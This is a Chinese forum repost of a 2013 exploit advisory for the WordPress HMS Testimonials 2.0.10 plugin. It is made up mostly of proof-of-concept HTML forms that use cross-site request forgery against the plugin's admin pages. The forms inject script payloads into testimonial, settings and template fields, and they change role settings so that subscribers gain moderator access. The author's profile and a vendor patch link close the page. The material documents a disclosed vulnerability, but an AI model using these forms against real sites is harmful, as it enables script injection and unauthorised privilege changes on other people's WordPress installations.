WordPress HMS Testimonials 2.0.10 XSS / CSRF漏洞

2013-08-10 10:01:22 13 3405
原文地址:http://www.1337day.com/exploit/21090



测试方法:

Proof of Concept
========================
1. Testimonial
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-addnew">
    <input type="hidden" name="name" value="<script>alert('xss')</script>">
    <input type="hidden" name="image" value="<script>alert('xss')</script>">
    <input type="hidden" name="testimonial_date" value="08/08/2013">
    <input type="hidden" name="url" value="<script>alert(String.fromCharCode(88,83,83))</script>">
    <input type="hidden" name="testimonial" value="<script>alert('xss')</script>">
    <input type="hidden" name="display" value="1">
    <input type="submit" name="save" value="Save Testimonial">
</form>

2. Group
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-addnewgroup&noheader=true">
    <input type="hidden" name="name" value="New group">
    <input type="submit" name="save" value="Save Group">
</form>

3.1. Settings - Default
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings">
    <input type="hidden" name="active_links_nofollow" value="1">
    <input type="hidden" name="image_width" value='100'>
    <input type="hidden" name="image_height" value='100'>
    <input type="hidden" name="date_format" value='m/d/Y"><script>alert(3)</script>'>
    <input type="hidden" name="testimonial_container" value='div'>
    <input type="hidden" name="recaptcha_publickey" value="">
    <input type="hidden" name="recaptcha_privatekey" value="">
    <input type="submit" name="save" value="Save Settings (Default)">
</form>

3.2. Settings - Advanced
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings-advanced">
    <input type="hidden" name="moderator" value="subscriber">
    <input type="hidden" name="roles" value="subscriber">
    <input type="hidden" name="num_users_can_create" value="9999">
    <input type="hidden" name="autoapprove" value="subscriber">
    <input type="hidden" name="moderators_can_access_settings" value="1">
    <input type="hidden" name="js_load" value="1">
    <input type="hidden" name="roleorder[]" value="editor">
    <input type="hidden" name="roleorder[]" value="author">
    <input type="hidden" name="roleorder[]" value="contributor">
    <input type="hidden" name="roleorder[]" value="subscriber">
    <input type="submit" name="save" value="Save Settings (Advanced)">
</form>

3.3. Settings - Custom Fields
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings-fields">
    <input type="hidden" name="name" value="xss">
    <input type="hidden" name="type" value="textarea">
    <input type="hidden" name="showonform" value="1">
    <input type="submit" name="save" value="Save Settings (Custom Fields)">
</form>

3.4. Settings - Template
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-templates-new">
    <input type="hidden" name="name" value="New template<script>alert('xss')</script>">
    <input type="hidden" name="item[]" value="system_id">
    <input type="submit" name="save" value="Settings Templates (Save)">
</form>


厂商补丁:

http://wordpress.org/plugins/hms-testimonials/
类别 Web安全

关于作者

xiaowei29篇文章563篇回复浙江省台州市路桥区峰江中学 学生

xiaowei
13

评论13次

要评论?请先  登录  或  注册